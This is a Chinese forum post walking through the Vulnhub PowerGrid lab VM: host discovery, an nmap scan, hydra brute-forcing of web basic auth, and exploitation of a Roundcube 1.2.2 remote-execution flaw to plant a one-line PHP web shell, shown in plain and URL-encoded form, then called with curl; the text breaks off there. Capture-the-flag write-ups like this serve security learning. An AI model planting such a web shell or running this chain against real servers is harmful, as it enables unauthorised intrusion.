ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之PowerGrid详细测试过程 [打印本页]
作者: 立聪堂德州十三局店    时间: 2023-3-20 14:29
标题: Vulnhub之PowerGrid详细测试过程
PowerGrid

识别目标主机IP地址
  1. (kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
  2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
  3.                                                                                                                            
  4. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
  5. _____________________________________________________________________________
  6.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  7. -----------------------------------------------------------------------------
  8. 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
  9. 192.168.56.100  08:00:27:20:6b:2a      1      60  PCS Systemtechnik GmbH                                                   
  10. 192.168.56.107  08:00:27:b1:02:85      1      60  PCS Systemtechnik GmbH   
复制代码
NMAP扫描
  1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
  2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.107 -oN nmap_full_scan
  3. Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 21:40 EDT
  4. Nmap scan report for bogon (192.168.56.107)
  5. Host is up (0.00034s latency).
  6. Not shown: 65532 closed tcp ports (reset)
  7. PORT    STATE SERVICE  VERSION
  8. 80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
  9. |_http-title: PowerGrid - Turning your lights off unless you pay.
  10. |_http-server-header: Apache/2.4.38 (Debian)
  11. 143/tcp open  imap     Dovecot imapd
  12. |_imap-capabilities: LOGIN-REFERRALS LITERAL+ post-login more STARTTLS Pre-login IMAP4rev1 SASL-IR capabilities ENABLE ID OK listed LOGINDISABLEDA0001 have IDLE
  13. |_ssl-date: TLS randomness does not represent time
  14. | ssl-cert: Subject: commonName=powergrid
  15. | Subject Alternative Name: DNS:powergrid
  16. | Not valid before: 2020-05-19T16:49:55
  17. |_Not valid after:  2030-05-17T16:49:55
  18. 993/tcp open  ssl/imap Dovecot imapd
  19. |_imap-capabilities: LOGIN-REFERRALS LITERAL+ post-login more OK IMAP4rev1 SASL-IR capabilities ENABLE ID AUTH=PLAINA0001 listed Pre-login have IDLE
  20. | ssl-cert: Subject: commonName=powergrid
  21. | Subject Alternative Name: DNS:powergrid
  22. | Not valid before: 2020-05-19T16:49:55
  23. |_Not valid after:  2030-05-17T16:49:55
  24. |_ssl-date: TLS randomness does not represent time
  25. MAC Address: 08:00:27:B1:02:85 (Oracle VirtualBox virtual NIC)
  27. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  28. Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
复制代码
获得Shell

/zmail需要网页基本认证
从网页内容看,有3个用户名deez1, p48 and all2,将其创建为用户名字典,然后用hydra进行破解
成功通过基本认证,用相同的用户名和密码进行网页登录
有一封邮件:
<img alt="" loading="lazy">
  1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
  2. └─$ vim pgp_message   
  3.                                                                                                                               
  4. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
  5. └─$ cat pgp_message   
  6. -----BEGIN PGP MESSAGE-----
  8. hQIMA1WQQb/tVNOiARAAub7X4CF6QEiz1OgByDAO4xKwLCM2OqkrEVb09Ay2TVVr
  9. 2YY2Vc3CjioPmIp1jqNn/LVLm1Tbuuqi/0C0fbjUTIs2kOWqSQVVpinvLPgD4K+J
  10. OykGxnN04bt9IrJddlkw3ZyZUjCBG46z+AS1h+IDCRezGz6Xq9lipFZwybSmL89J
  11. pijIYF9JAl5PeSQK9kTHOkAXIsLUPvg8fsfa9UqGTZfxS6VhlNmsoFDf4mU6lSMl
  12. k4VC2HDJwXoD+dEdV5dX1vMLQ5CKETR1NjaWV/D++YTaZMO+wj5/qekfhqDXh0Yo
  13. 4KhqKKlAbk/XhPuRmuj/FnS/8zwlYH9wPYuacBPXLwCIzaQzkn5I+7rVeeMqoT82
  14. c2F7ASQy79COk9eU900ToCyjjXQwnlBaQ51QOZjnQgcEnKVmrbURgzpQUVzdy8Oy
  15. XvysJt3OBIJ9zT1l7fq5slmCjVAq8G2nlhdNv1K27+79eVPzrJ3pqg+MlssXRb3T
  16. PQ3hPgKR7U/YgU6O9YorAoJmgxD2CsmGrmK66jwbTKBONTxcfUg+gu1z8Ad4gleL
  17. +Gbk4qMuLVFGzEBdeJYzRD7m6F3Ow/evwjzMr5fDdSOUSATOKuki0dOx14OTFNzP
  18. CJbDZzquZ294lvFviYMSNQy7cWNN86gVQWyWUW0f+Ui3UONTIr9e0gLez/OJUwzS
  19. 6wHHu7TA3lgwvc/iMjpuPLnGo046T8J0IqXZHOIn0LJXP36I0l4vTAGtKpZuGNS+
  20. zT/R1y6eIBd5CInFwLXbkbhOomwEfbHQci0zKHzjpEnx8a18zbuNLB4dclN3nyni
  21. Fnh2S0YYPEoJXWKA6ToNuQF/GZyI8QKELyc4ZhkHiKmdN6Q9z659JWQOnM/MW+tB
  22. sjxwjesbAO+hjc19ok0VUsiMVj8TnUuB1Ifgf4ItnDzP8Myc59/FaS46eVy7Y7M1
  23. sICrc62wVLkglG2zjIvTF3CYPYrJDB6+BXOGJv7vpPdcbpaVwc1KYjZW9JMfVLIz
  24. NGY1zaz5nY9sZw/Q5rmYyUAzHnMjuOkRNjRuSjEHHZEG/gLLco6GCeBQzZqvyiXM
  25. auuvO37nFduss3U+7sLd4K3IabgZZHaEu4QEDiuZc40WVSZOIhv5srcLnky2GSPe
  26. a0xjQxSvMNKroyx2IoKLNkUq1fDGbGD/Wu4erOz/TO0/SqnAJK9Mqh6CjUhAZwxE
  27. m+ALMtyYd3wyUcclqG1ruprGKKMB0KRNxAtIL+RXmUvqhoPAazqZ/X6QW+mekt6f
  28. /sBuDEXD++UPqYi24kO0E1UB8bdRNP+sVxdFMoImahcqRog1tPp09aVcLcEtQBIP
  29. 7CZ/kUsQmEe5yPbK5W/0xSo8+B4OranG9eHvjQlu/pS6GCsyT8NzEiZYMVQ5qs/A
  30. 04Rm5H5V7W+elw9svPBSjDj6XBhUvUekJ9jU7es018k2fZ8gid1kFurNZ7xOLyTL
  31. ebzLqsOszwIhGYEpYnt2m9R0M7eoEq4pmwfra5oaaNrDhKFAp6DddERMNmembr42
  32. cLH1xBWuE2AVqFwbeEUYjVt+Sy1OauuAGkMy9KxXSzR//1wQ0hojooz6XsY/a3c1
  33. huvrG4CzMT8cPbNDMSvOGca0l+QpmQ7qg14sYZuJcqARue07DgpQIsOXeUspFooO
  34. lOUsNrJwJcpWJViKuJ9XuwcprBowdz6Y6WmeY57R13ivoHy+j+2s2Sefq6rjMzEw
  35. HtatDtk9BA4gBFREqSldmepAnvE3GiJJEYHwC7sQCoqNB15/ftTM9LtbMRe05FXm
  36. 9mLcD2aSP5BIy9jrCBJqPjdsnxupqeBxMx9do79iCXIXms6VbNpnBeKMZFrnFx+Z
  37. LMd13s2pWA0CApb3JATcGa4adKs2k4L08oSr+revlX3fUvey090VSji+Kebi7gJ/
  38. l08BWpMZbLbf9J6zgbLbWfl8OQbYLl94A8lTDK5m7JKLSSL/B16jx2LWPIGSszLS
  39. NxlWCk0ae5Lf75Bbux12xkDukXsODd+hkksNQ4M/E8wgBoRmrL9P/CUX4YvrVT9u
  40. qK98rhQPeIJMYwYiZVb4K7L18EyKK6S+jn5LwwUxzpkRRNZ8mg+lbtiSwTDtG8IK
  41. l6+3kTIPcECGPbghf0GFH7PnQY8f0MO9IbYsy2pcoagGtizUecyraxPF9qPwoBV3
  42. 4QBz+/KLKUpqwLUoKc5PLn7RAJcXZiY8QkSBW6jbieoblylDOIuDjpd3IYqCqjW8
  43. WOI/XS4zi5R3mozMosLrohm27iDsuFNnEIiWFITYTrHuNRk1xW4YoZPiW22mp7qE
  44. xnhp7GpepiD8RoRjj0AJThSa2Mlva/bfHwm98Fk8j4R60stBqkK/+/7htpnwzQhF
  45. e2w7UZwh+EmwNGPyfeWn/4OAS8evTQc2svc/qHXvrHRid/6yDQt4ZCsJmsLDUEkj
  46. 1KG++hRMC7TYPXP/LovWxm8JgKwI0T+szYMXDSVOdGEM/168y7UMA/v28NJ7emzf
  47. cC8JWBH4u4XntgwzEsc02BaY1E0NJ86/JuOX4ajYxDWlXR+jJmmLWtbbI5mWW9mr
  48. KaMzgdXQYQmmfMWJ/BLvb95FTg7R0QemsT1mk2jOfalaHz4670qRKhI48rb0+c6Y
  49. COYINTgYLtO1BtKkOR9Y7MMcvmCD+GecL29gCvL+t+/VDLkvwvWErX4jTbjuLwJX
  50. yGJKa7imlr4k72ZjhKJPivmdv4K8XtQKpBqtfop1Bma0EoFyQvIuuQpA9oP3qghl
  51. MMFCF4PVpmSI0clZxJYcJX1VI6bkfc0hp4uj3Pu5+G6OJHPOsgoSdFwkX1dBFp2I
  52. Yir6n929kn+OyX/T5hrBIiSs+1rujRC/AeV7+/BDVfoTk7Ti0MHnQ89K2L0xqayh
  53. aw5mnpDFcOdBWBr5f5fBc2KxO8UK2Dyj5cTL05wvC8vzi81Zy8WzwEMnDAQ3hqTp
  54. qymGZOhD1X0cpxRO3MTMHf7W3AJNmOqhU87teqDJQXmAeZ3Cy1zIIh3Y8Jem3A5y
  55. 7+dUSAJacrdfqf8CNsGLT7iiyGCHOQH8Pig/9yCP1lerGBMN3rXeqBqoxSSYGa5Q
  56. OUzqgcvBwO6Enn4f9LPvKeMywhMgJU4MFtvSumulFYeoLJnzpDsXimFzXlKncKai
  57. nzgqHgyZahwCo41DOvIdY5qSrkspUexqF80wy/C870rnvMIea9iiUT2+gSmM27zZ
  58. 0xKQ0pMZygMJ1/tGNAGdByvjcP3eZR9tclu4/nBiNQV3EcZzrp/GQ26lukzgHIp/
  59. 3w4U4DRtKleemh+ibKzHwnKiB766Z/DC2KBVtxK6AM4TiJ+0COfBiGTpi1hwNxfS
  60. yI26D5VncheNkiOH9UEg7Smi5n104L7lFq8Z4w3uNR9IgMZSEbOKpPP5gvd8DlZC
  61. QUJzYkPHWdQPBIVgqiboTw7UmKFxF3tne9lnZEmPgD5z6VUP5H3cixPCqBIMtM3s
  62. WdaACLBSW8hebDTuJOHikONjUKcy+3pdLN/70CQ4uk7Zt+VVTL0bsYpmMqqBabU4
  63. +xLXl2QiSLawg68DlE2aM/1DW219LfEiXO1AwGIAByP+j/g6tI3qujXT1UrimKHu
  64. iIo9m9k/hQGPfm4jeNL3mgScuhOof4Xqh8QMpGMCXUQZUGvgzJa9gq4j/pe/8KK7
  65. yYmpZGblM7y9ForPlM3dcZMGCnUtfjUf8p5f2HvWMWBZVMWe0EjI/5NqCLqrfBSx
  66. 0YzDg1eCiNCWS53OA2HeAu97QdVXWk0vCeq+KUmTNt9/mRqALpEUZ0REae7v5OhL
  67. 5YRfmnYwj+3zyvF4m/iC2rWKyQKREXN5vRaCWmTDpy54cU0sotpOLxTfnW6Ab/KR
  68. y88xv7Si7n8yyBtWfBf6wTSXa7oo8f0KPxycNOiFAUJD9oGtL0ICpPeaZnW+2pCr
  69. EWQat6BOsAjJIZALUVfOgJn8QyV6spySr5W91dp4dZ05v544ysT/zHJG29+iLmq6
  70. 7b7CiONwnj48KQhq7FF8iEu/Hi2qcoH9MCmog7i3QPGQXEq+6M1mtXAqXY43Qxmu
  71. 2m1PP5YLf47r4/cVccg721ag9ffLdL6kUkj9eHPAU/MqI3JX29HF9XTwSu07Vo32
  72. Ym6niojCCeMsf9DuvR92UtOAwMjUrDiQQOM0eL2P7Z21IB6Zb+I7Iqws03zQ5nkD
  73. TYVQnJbdsqsz7Egj+y/gh9Omg/iBxqP2qZ7uEAiQg4P/EEHPMBChe2+SRtYO139v
  74. ChZA53z11q0DzTtmbhoHqIDQ97J9yrdQe6YHvW+zKQMcoEiiOaaJkF6pzmLBGQt2
  75. EH9IQnxd39jtzzLsKWPFUe3G30ELm5TtnMd9WBQVtKNHxlCtD1eB3bTJgC6iHcOA
  76. JowxDggqVtdxKQQEjLGquUkoS7Al5iMnuiA+AXFC5VMmnoPD9v/M3CZaM7qt6LOg
  77. K5usFSp0gwjGvPQO1UJucrKyXSBlOxFbzOxcKClRGqHU4+Ir8Iu8MH1dlTmYH1Qr
  78. UOdasHinj5UODyJyS7rHrzDr9kBKC7AAnCt0WHX7K3jVJEg0TnGpLFFIic7XrMld
  79. 6SXxrg0VWv1nqyKqaRXANGFqslktVGktJURntzj/kZD/9sO4Y6qoHMDNC3Aib3m9
  80. RO1va5L9lriZ1vmP37FxIwsrCVVcNrPJxWydvw==
  81. =fPY9
  82. -----END PGP MESSAGE-----
复制代码
<img alt="" loading="lazy">
从About页面可知Roundcube Webmail的版本为1.2.2,该版本有相应的远程执行漏洞:
  1. https://www.exploit-db.com/exploits/40892
复制代码
<img alt="" loading="lazy">
<img alt="" loading="lazy">
根据漏洞利用步骤利用burpsuite修改请求:
<img alt="" loading="lazy">
然后访问rce.php文件
<img alt="" loading="lazy">
phpinfo();可以成功得到执行
现在创建一个shell.php文件,写入一句话:
  1. ┌──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]
  2. └─$ cat shell.php  
  3. <?php
  4.         system($_GET['cmd']);
  5. ?>
  6.    
复制代码
对一句话url编码:
  1. %3C%3Fphp%0A%20%20%20%20%20%20%20%20system%28%24_GET%5B%27cmd%27%5D%29%3B%0A%3F%3E%0A
复制代码
<img alt="" loading="lazy">
然后访问shell.php文件
[code]──(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]└─$ curl http://192.168.56.107/shell.php?cmd=id                                                                     01999



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4